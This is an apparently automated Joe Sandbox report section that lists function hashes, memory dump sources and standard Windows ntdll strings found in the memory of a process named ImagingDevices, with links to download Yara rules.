                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                  Function 0087FE24 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                  Function 0087FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                  Function 0087FFFC Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                  Function 0087FF34 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                  Function 008A8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 008A8827
                                                                                                  • WindowsExcludedProcs, xrefs: 008A87C1
                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 008A89FC
                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 008A8914
                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 008A87E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcspbrk
                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                  • API String ID: 402402107-258546922
                                                                                                  • Opcode ID: df8f2c5f109eda0afed49c87601ec1f2a2b10895b0cd85d2615bee60d0e9906f
                                                                                                  • Instruction ID: 989b61ecee265fce2babca7afe7351708cb19c59eed55a9116b792e6efbcda00
                                                                                                  • Opcode Fuzzy Hash: df8f2c5f109eda0afed49c87601ec1f2a2b10895b0cd85d2615bee60d0e9906f
                                                                                                  • Instruction Fuzzy Hash: 41F108B2D00209EFDF11EFA8C9819EEBBB8FF09304F14446AE505E7611EB359A45DB61
                                                                                                  Function 0091822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                  • API String ID: 3628947076-1387797911
                                                                                                  • Opcode ID: ce91109c8ea7335c84a875948355e2430f3c7f0d8b17c5cce92ea519977c6c9f
                                                                                                  • Instruction ID: fab3965c577ff97d1c6eb75f68e1291a105f90b9e32dc9ba835dbf5b3ef000e0
                                                                                                  • Opcode Fuzzy Hash: ce91109c8ea7335c84a875948355e2430f3c7f0d8b17c5cce92ea519977c6c9f
                                                                                                  • Instruction Fuzzy Hash: BB41B77234460DBEEB019AA1CC42FDF776CEF45B44F140212FA14D5191DBB4DB91ABA4
                                                                                                  Function 008C13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
                                                                                                  • Instruction ID: 0d6d8136181e595b8646191786bf4fa643aa54d88bd7356b9060577c63683265
                                                                                                  • Opcode Fuzzy Hash: 353a85f10c19eeca903fba974784c3f0c63ad3d3bacacc1c5cc2dceebf9a7dec
                                                                                                  • Instruction Fuzzy Hash: 5D610571900695AACF28DF69C8C4CBEBBB6FF96304718C16DE4D6C7642D634EA40CB64
                                                                                                  Function 008B7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 008D3F12
                                                                                                  Strings
                                                                                                  • Execute=1, xrefs: 008D3F5E
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 008DE345
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 008D3F75
                                                                                                  • ExecuteOptions, xrefs: 008D3F04
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 008D3EC4
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 008DE2FB
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 008D3F4A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BaseDataModuleQuery
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 3901378454-484625025
                                                                                                  • Opcode ID: aa98e10c558e65ee98c67f0e00fe7822b6750686d4b70dc8cae4e5c15e09e22b
                                                                                                  • Instruction ID: 75b4d61ae4fadee0209ace6c65fd367591ddb9c8295179abc4713d9d6205e1a7
                                                                                                  • Opcode Fuzzy Hash: aa98e10c558e65ee98c67f0e00fe7822b6750686d4b70dc8cae4e5c15e09e22b
                                                                                                  • Instruction Fuzzy Hash: 2A419771A8031D7ADF20AB98DCC6FEA73BCFB54704F0005A9F505E6391EE709A458B66
                                                                                                  Function 008C0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __fassign
                                                                                                  • String ID: .$:$:
                                                                                                  • API String ID: 3965848254-2308638275
                                                                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                  • Instruction ID: 8fd7c43a5d879553d9dd3548392db894cefb4e9d4a80d6b0b37766c991082b52
                                                                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                  • Instruction Fuzzy Hash: 3AA19B71D0031AEBCB24DFA8C845BAEB7B4FB05395F24856ED842E7282D630DA41CF52
                                                                                                  Function 008C0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E2206
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-4236105082
                                                                                                  • Opcode ID: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
                                                                                                  • Instruction ID: 9370d6c57b9bafe922966190555a88ba70e3a807648f5901659822d51d1fe5d7
                                                                                                  • Opcode Fuzzy Hash: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
                                                                                                  • Instruction Fuzzy Hash: AC515971B002456BEB249B19CC82F6673ADFF85710F218269FD14DB385E931EC418BA1
                                                                                                  Function 008C14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___swprintf_l.LIBCMT ref: 008EEA22
                                                                                                    • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C146B
                                                                                                    • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C1490
                                                                                                  • ___swprintf_l.LIBCMT ref: 008C156D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  • Opcode ID: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
                                                                                                  • Instruction ID: 59f404ca7fc0b26f684ea4dc7bb352404320c3bd97eebb5d670a4339af528709
                                                                                                  • Opcode Fuzzy Hash: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
                                                                                                  • Instruction Fuzzy Hash: E72184729006199BCF21EE58CC85FEA73BCFB91704F544159F846D3241DB74EA588BD1
                                                                                                  Function 008A53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E22F4
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 008E230B
                                                                                                  • RTL: Re-Waiting, xrefs: 008E2328
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-871070163
                                                                                                  • Opcode ID: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                                                                                  • Instruction ID: 2ca0ade7d821966cbdedf6cd2ddefee1e062d6349907fe140793985e9ff74962
                                                                                                  • Opcode Fuzzy Hash: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                                                                                  • Instruction Fuzzy Hash: 1F5128716006056BEF11DB29CC81FA673ACFF96360F104229FD18DB781EA71EC818BA1
                                                                                                  Function 008AEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008E248D
                                                                                                  • RTL: Re-Waiting, xrefs: 008E24FA
                                                                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008E24BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                  • API String ID: 0-3177188983
                                                                                                  • Opcode ID: 16cbd6eb6be60d790d755cbd31a705052e7c83dc16ef92ce7d5d18f97089dc20
                                                                                                  • Instruction ID: c34ff95a517301b841fe9d076794401ab5931e88bd569f2886f5e2aae9469c8e
                                                                                                  • Opcode Fuzzy Hash: 16cbd6eb6be60d790d755cbd31a705052e7c83dc16ef92ce7d5d18f97089dc20
                                                                                                  • Instruction Fuzzy Hash: A941E470604204ABDB20EB69CC89F6A77B8FF46724F208A09F565DB3D1D734E9418766
                                                                                                  Function 008BFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
